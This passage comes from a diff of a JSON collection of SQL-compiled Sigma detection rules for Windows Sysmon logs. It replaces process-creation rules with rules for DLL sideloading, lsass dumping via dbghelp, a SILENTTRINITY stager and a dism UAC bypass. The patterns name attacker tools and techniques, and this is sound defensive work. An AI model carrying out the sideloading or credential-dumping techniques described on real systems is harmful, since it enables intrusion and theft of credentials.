executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "status": "test", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE 